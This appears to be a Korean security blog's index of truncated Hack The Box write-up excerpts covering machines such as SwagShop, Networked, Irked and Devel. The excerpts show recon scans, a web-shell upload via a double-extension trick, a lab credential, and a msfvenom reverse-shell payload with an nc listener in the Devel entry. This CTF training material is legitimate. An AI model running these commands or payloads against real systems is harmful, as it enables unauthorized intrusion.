Wargame/Hack The Box
-
-
[HTB] SwagShop WriteupWargame/Hack The Box 2022. 5. 8. 18:17
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.153.231 80포트에 접근해보았지만 아래 URL로 리다이렉트되는 것 외 단서가 없어서 추가적인 조사를 해봤다. gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.129.153.231/ -x php,txt -o bigList nikto -h 10.129.153.231 -p 80 -output niktoResult.txt 우선, 페이지가 제대로 로딩되지 않는것은 hosts파일을 설정해줌으로써 해결했다. Magento에 대한 취약점을 찾아보자. 첫 번째로 37977.py를 사용 했다. target을..
-
[HTB] FreindZone WriteupWargame/Hack The Box 2022. 2. 16. 18:56
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.1.225 smb에 접근이 가능한것으로 보여 탐색을 해보았다. general 디렉토리에 읽기 권한, Development에 읽기, 쓰기 권한이 있음을 확인했다. smbmap -H 10.129.1.225 general 디렉토리에 cred.txt라는 파일이 있어서 확인해보았다. smbclient //10.129.1.225/general get creds.txt general_creds.txt 계정/패스워드 정보가 있었지만 ssh 접속 정보는 아니었다. 기억해두도록 하자. admin:WORKWORKHhallelujah@# Development 디렉토리에는 현재 파일이 존재하지 않았다. 그 외 기타 포트에 대한 취약점..
-
[HTB] Networked WriteupWargame/Hack The Box 2022. 2. 9. 22:57
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.154.46 gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.129.154.46/ -x php,txt -o gobusterResult.txt /upload.php를 통해 파일 업로드를 하면, /uploads/ 에 파일이 업로드 되는데 이 때 파일명이 변환된다. /backup 에는 소스파일이 있다. 이 파일들을 분석 해보니 이미지 파일만 업로드가 가능했다. 소스코드 분석 및 여러 시도를 하면서 이미지 파일 뒤에 php 소스를 붙히고, 이미지 이름을 aa.php.png와 같이 하면 웹쉘이 실행 가능..
-
[HTB] Irked WriteupWargame/Hack The Box 2022. 2. 7. 22:44
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.1.108 80포트에는 이미지 파일만이 존재했다. 다른 취약점이 있나 확인해보았다. nmap --script vuln 10.129.1.108 -p 22,80,111,6697,8067,50193,65534 -o nmapVulnScanResult.txt 8067 포트의 unrealircd backdoor 취약점을 통해 공략해보기로 했다. 관련해서 구글링을 하다가 아래 레퍼런스를 발견했다. https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor GitHub - Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor: My backdoor s..
-
[HTB] Sunday WriteupWargame/Hack The Box 2022. 2. 6. 14:24
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.152.134 finger service 공격 https://book.hacktricks.xyz/pentesting/pentesting-finger 79 - Pentesting Finger - HackTricks Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office locati..
-
[HTB] Bounty WriteupWargame/Hack The Box 2022. 2. 5. 16:24
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.151.89 80포트가 활성화 되어있어서 접근해보았다. 해당 이미지 외에 별도의 취약 포인트를 찾을 수 없는듯 하여 dirb와 gobuster를 통해 조사해보았다. dirb http://10.129.151.223/ -X .php,.txt,.aspx,.conf -o dirbResult.txt gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.129.151.223/ -x php,txt,conf,aspx -o bigList transfer.aspx와 /uploadedfiles/가 존재함을 확인했다. t..
-
[HTB] Devel WriteupWargame/Hack The Box 2022. 2. 3. 21:32
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.150.253 ftp에 anonymous 계정으로 접근 가능하므로 리버스쉘을 업로드 하자. msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.114" LPORT=1234 -f aspx > reverseShell.aspx ftp put reverseShell.aspx nc -nvlp 1234 권한 상승을 위해 systeminfo 정보 저장 후 wes.py를 통해 유효한 취약점을 찾아보았다. python3 wes.py systeminfo.txt -i "priv" 그 중 40564.c를 활용하기로 했으며 문서에 안내되어있는대로 컴파일을 했다. i686-w64-mingw3..